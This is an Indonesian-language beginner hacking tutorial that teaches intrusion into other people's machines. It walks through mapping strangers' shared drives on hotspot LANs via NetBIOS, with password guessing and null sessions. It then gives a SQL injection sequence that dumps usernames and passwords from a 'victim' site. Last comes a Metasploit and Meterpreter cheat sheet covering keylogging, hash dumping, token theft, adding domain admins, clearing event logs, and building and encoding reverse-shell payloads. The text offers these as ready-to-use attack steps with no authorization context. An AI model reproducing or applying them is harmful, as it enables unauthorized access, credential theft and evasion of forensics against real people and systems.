Hacking yaitu menjebol sistem keamanan komputer untuk mendapatkan hak akses tertinggi (administrator/root) sehingga kita bisa mengendalikan komputer itu sendiri baik secara local atau remote (jarak jauh).
Bagi siapa saja yang ingin belajar hacking alias jadi hacker cara berikut bisa di coba:
- Pahami bahasa Inggris karena dalam dunia hacking kebanyakan menggunakan istilah dalam bahasa Inggris
- Belajar pemrograman (C/C++, Python, Javascript, dll)
- Belajar networking ( TCP/IP)
- Belajar UNIX (Linux)
- Belajar Operating System
- Belajar tentang database (MySQL, Oracle,dll)
- Belajar sabar, tekun, insting, dan penalaran karena dalam proses hacking kadang sangat menguras tenaga dan pikiran.
Rekomendasi buku bacaan untuk belajar hacking bagi pemula:
- The C Programming Language 2nd Edition by Dennis Ritcie dan Brian W. Kernigan
- The C++ Programming Language by Bjarne Stroustrup
- Learning Perl by Randal Schwartz, Tom Christiansen & Larry Wall
- TCP/IP Illustrated Vol. 1 by W. Richard Stevens
- Learning the Unix Operating System by Jerry Peek, Grace Todino & John Strang
- Operating System Internals by William Stalling
- Operating Systems : Design and Implementation 2nd Edition by Andrew S. Tanenbaum & Albert S. Woodhull
- Hacking Exposed : Network Security Secrets and Solutions by Stuart McClure, Joel Scambray and George Kurtz
Nah loch… pusing ga tuh? Masih banyak rekomendasi buku lain tapi belum saya sebutkan karena takut kalian pingsan setelah baca buku-buku tersebut wakakak…
Berikut ini saya berikan contoh metode termudah masuk ke komputer orang lain yang biasa dilakukan oleh para Script Kiddies. Metode ini disebut NetBIOS Hacking, metode ini digunakan dengan memanfaatkan kelalaian atau ketidaktahuan seseorang men-share file ke jaringan.
Biasanya metode ini berhasil dipakai pada suatu LAN seperti hotspot area yang ramai karena terkadang ada aja orang yang men-share file tertentu ke jaringan. Kalau beruntung mungkin kamu bisa menemukan drive sensitive yang di share, contoh drive C:\ pada windows.
Berikut ini caranya : Pengetahuan dasar yang harus dikuasai untuk menggunakan metode ini adalah menguasai perintah2 DOS (Command Prompt) dan IP addressing. Tools yang dipakai dalam metode ini antara lain :
1. Nmap (Network scanner andalan hacker dunia, sempat dipakai dalam film Matrix Reloaded)
2. Nbtscan (tool ini lebih mudah dipakai dalam metode ini karena hanya men-scan netbios port).
Praktek : Bukalah DOS Prompt dengan meng-klik Start –> Run –> ketik CMD –> Enter Misalkan kamu dalam suatu LAN seperti hotspot area, ketik Ipconfig untuk melihat IP address kamu di LAN tersebut, misalnya IP kamu adalah 192.168.1.100. Untuk melihat komputer siapa saja yang terhubung di LAN tersebut gunakanlah nmap. Contoh :
C:\>nmap -sP 192.168.1.0/24 Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-28 15:40 GMT Standard Time Host 192.168.1.1 appears to be up Host 192.168.1.3 appears to be up Host 192.168.1.32 appears to be up Host 192.168.1.97 appears to be up Host 192.168.1.100 appears to be up Nmap done: 5 IP addresses (5 hosts up) scanned in 13.309 seconds
Berdasarkan hasil scanning diatas terlihat bahwa ada 5 komputer yang aktif dan terhubung ke jaringan (IP 192.168.1.1 adalah router). Dari hasil diatas juga terlihat bahwa IP kamu 192.168.1.100 terhubung ke jaringan. Untuk melihat IP adress mana yang membuka port netbios ketikkan perintah ini :
C:\>nmap -sS -p 139 192.168.1.0/24 Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-28 15:40 GMT Standard Time Interesting ports on 192.168.1.32: PORT STATE SERVICE 139/tcp open netbios-ssn MAC Address: 00:14:6C:19:F8:45 (Netgear)
Interesting ports on 192.168.1.100: PORT STATE SERVICE 139/tcp open netbios-ssn MAC Address: 00:21:7C:69:D5:30 (Netgear) Nmap done: 2 IP address (2 host up) scanned in 26.158 seconds
atau
C:\>nbtscan 192.168.1.0/24 Doing NBT name scan for addresses from 192.168.1.0/24
IP address NetBIOS Name Server User MAC address ——————————————————————————————- 192.168.1.32 Target <unknown> 00-4a-53-24-c1-86 192.168.1.100 Kamu <unknown> 00-1c-26-33-d4-70
Wow.. tampaknya IP 192.168.1.32 membuka port netbiosnya (ingat bahwa 192.168.1.100 adalah port kamu). Sekarang kita tinggal melihat apakah ada file yang di share oleh IP tersebut caranya ketik berikut :
C:\>net view \\192.168.1.32 Shared resources at \\192.168.1.32 Sharename Type Comment D Disk The command was completed successfully.
Wah ternyata target men-share directori D-nya. Setelah kita melihat nama folder yang di share lalu kita lihat apa isi dari folder tersebut dengan mengetik perintah berikut :
C:\>net use x: \\192.168.1.32\D The command completed succesfully
Penjelasan dari perintah tersebut yaitu kita akan menggunakan drive X dalam komputer kita untuk mengganti folder D dari komputer target. Drive X ini akan muncul pada windows explorer kamu setelah mengetik perintah diatas. Drive X ini adalah contoh dari saya, kamu bisa bebas menggunakan drive apapun selain drive yang telah ada di komputer kamu.
Perintah tersebut tidak berhasil jika komputer target meminta Username dan Password. Akan tetapi kita bisa mencoba dengan melakukan Password Guessing caranya
NET USE \\192.168.1.32\D “password” /USER: “target”
atau dengan melakukan IPC Null Sesion
NET USE \\192.168.1.32\IPC$ “” /USER: “”
Password yang mungkin disini biasanya: Username, Administrator, dll Cobalah terus melakukan password guessing.
=====================================================
Tutorial Singkat SQL Injection
SQL injection adalah sebuah teknik hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Berikut saya berikan tahapan-tahapan singkat dalam hacking website menggunakan SQL Injection :
1. http://www.korban.com/product.aspx?category=portable&id=1′
2.http://www.korban.com/product.aspx?category=portable&id=1 order by 10
3. http://www.korban.com/product.aspx?category=portable&id=1 order by 9
4. http://www.korban.com/product.aspx?category=portable&id=1 union all select 1,2,3,4,5,6,7,8,9–
5. http://www.korban.com/product.aspx?category=portable&id=-1 union all select 1,2,3,4,5,6,7,8,9–
6. http://www.korban.com/product.aspx?category=portable&id=-1 union all select 1,@@version,3,4,5,6,7,8,9–
7. http://www.korban.com/product.aspx?category=portable&id=-1 union all select 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()–
8. http://www.korban.com/product.aspx?category=portable&id=-1 union all select 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name=0×7573657273–
9. http://www.korban.com/product.aspx?category=portable&id=-1 union all select 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9 from users–
atau
http://www.korban.com/product.aspx?category=portable&id=-1 union all select 1,group_concat(concat_ws(char(32,58,32)username,password)),3,4,5,6,7,8,9 from users–
atau
http://www.korban.com/product.aspx?category=portable&id=-1 union all select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9 from users–
====================================================
Ringkasan Perintah-perintah Dalam Metasploit Console
Metasploit merupakan salah satu program yang paling banyak dipakai baik oleh hacker, penetration tester maupun para script kiddie, berikut ini saya berikan ringkasan-ringkasan perintah dalam metasploit console (command line):
show exploits
show all exploits within the Framework.
show payloads
Show all payloads within the Framework.
show auxiliary
Show all auxiliary modules within the Framework.
search name
Search for exploits or modules within the Framework.
info
Load information about a specific exploit or module.
use name
Load an exploit or module (example: use windows/smb/psexec).
LHOST
Your local host’s IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells.
RHOST
The remote host or the target.
set function
Set a specific value (for example, LHOST or RHOST).
setg function
Set a specific value globally (for example, LHOST or RHOST).
show options
Show the options available for a module or exploit.
show targets
Show the platforms supported by the exploit.
set target num
Specify a specific target index if you know the OS and service pack.
set payload payload
Specify the payload to use.
show advanced
Show advanced options.
set autorunscript migrate -f
Automatically migrate to a separate process upon exploit completion.
check
Determine whether a target is vulnerable to an attack.
exploit
Execute the module or exploit and attack the target.
exploit -j
Run the exploit under the context of the job. (This will run the exploit in the background.)
exploit -z
Do not interact with the session after successful exploitation.
exploit -e encoder
Specify the payload encoder to use (example: exploit –e shikata_ga_nai).
exploit -h
Display help for the exploit command.
sessions -l
List available sessions (used when handling multiple shells).
sessions -l -v
List all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system.
sessions -s script
Run a specific Meterpreter script on all Meterpreter live sessions.
sessions -K
Kill all live sessions.
sessions -c cmd
Execute a command on all live Meterpreter sessions.
sessions -u sessionID
Upgrade a normal Win32 shell to a Meterpreter console.
db_create name
Create a database to use with database-driven attacks (example: db_create autopwn).
db_connect name
Create and connect to a database for driven attacks (example: db_connect autopwn).
db_nmap
Use nmap and place results in database. (Normal nmap syntax is supported, such as –sT –v –P0.)
db_autopwn -h
Display help for using db_autopwn.
db_autopwn -p -r -e
Run db_autopwn against all ports found, use a reverse shell, and exploit all systems.
db_destroy
Delete the current database. db_destroy user:password@host:port/database Delete database using advanced options.
Meterpreter Commands
help
Open Meterpreter usage help. run scriptname Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory.
sysinfo
show the system information on the compromised target.
ls
List the files and folders on the target. use privLoad the privilege extension for extended Meterpreter libraries.
ps
Show all running processes and which accounts are associated with each process.
migrate PID
Migrate to the specific process ID (PID is the target process ID gained from the ps command).
use incognito
Load incognito functions. (Used for token stealing and impersonation on a target machine.)
list_tokens -u
List available tokens on the target by user.
list_tokens -g
List available tokens on the target by group. impersonate_token DOMAIN_NAME\\USERNAME Impersonate a token available on the target.
steal_token PID
Steal the tokens available for a given process and impersonate that token.
drop_token
Stop impersonating the current token.
getsystem
Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors.
shell
Drop into an interactive shell with all available tokens.
execute -f cmd.exe -i
Execute cmd.exe and interact with it.
execute -f cmd.exe -i -t
Execute cmd.exe with all available tokens.
execute -f cmd.exe -i -H -t
Execute cmd.exe with all available tokens and make it a hidden process.
rev2self
Revert back to the original user you used to compromise the target.
reg command
Interact, create, delete, query, set, and much more in the target’s registry.
setdesktop number
Switch to a different screen based on who is logged in.
screenshot
Take a screenshot of the target’s screen.
upload file
Upload a file to the target.
download file
Download a file from the target.
keyscan_start
Start sniffing keystrokes on the remote target.
keyscan_dump
Dump the remote keys captured on the target.
keyscan_stop
Stop sniffing keystrokes on the remote target.
getprivs
Get as many privileges as possible on the target.
uictl enable keyboard/mouse
Take control of the keyboard and/or mouse.
background
Run your current Meterpreter shell in the background.
hashdump
Dump all hashes on the target.
use sniffer
Load the sniffer module.
sniffer_interfaces
List the available interfaces on the target.
sniffer_dump interfaceID pcapname
Start sniffing on the remote target.
sniffer_start interfaceID packet-buffer
Start sniffing with a specific range for a packet buffer.
sniffer_stats interfaceID
Grab statistical information from the interface you are sniffing.
sniffer_stop interfaceID
Stop the sniffer.
add_user username password -h ip
Add a user on the remote target.
add_group_user “Domain Admins” username -h ip
Add a username to the Domain Administrators group on the remote target.
clearev
Clear the event log on the target machine.
timestomp
Change file attributes, such as creation date (antiforensics measure).
reboot
Reboot the target machine.
MSFpayload Commands
msfpayload -h
List available payloads.
msfpayload windows/meterpreter/bind_tcp O
List available options for the windows/meterpreter/bind_tcp payload (all of these can use any payload).
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X payload.exe
Create a Meterpreter reverse_tcp payload to connect back to 192.168.1.5 and on port 443, and then save it as a Windows Portable Executable named payload.exe.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R >
payload.raw
Same as above, but export as raw format. This will be used later in
Msfencode
msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c Same as above but export as C-formatted shellcode.
msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java Export as %u encoded JavaScript.
MSFencode Commands
msfencode -h
Display the msfencode help.
msfencode -l
List the available encoders.
msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)
Format to display the encoded buffer.
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
Encode payload.raw with shikata_ga_nai five times and export it to an output file named encoded_payload.exe.
msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
Create a multi-encoded payload.
msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
Create pure alphanumeric shellcode where ESI points to the shellcode; output in C-style notation.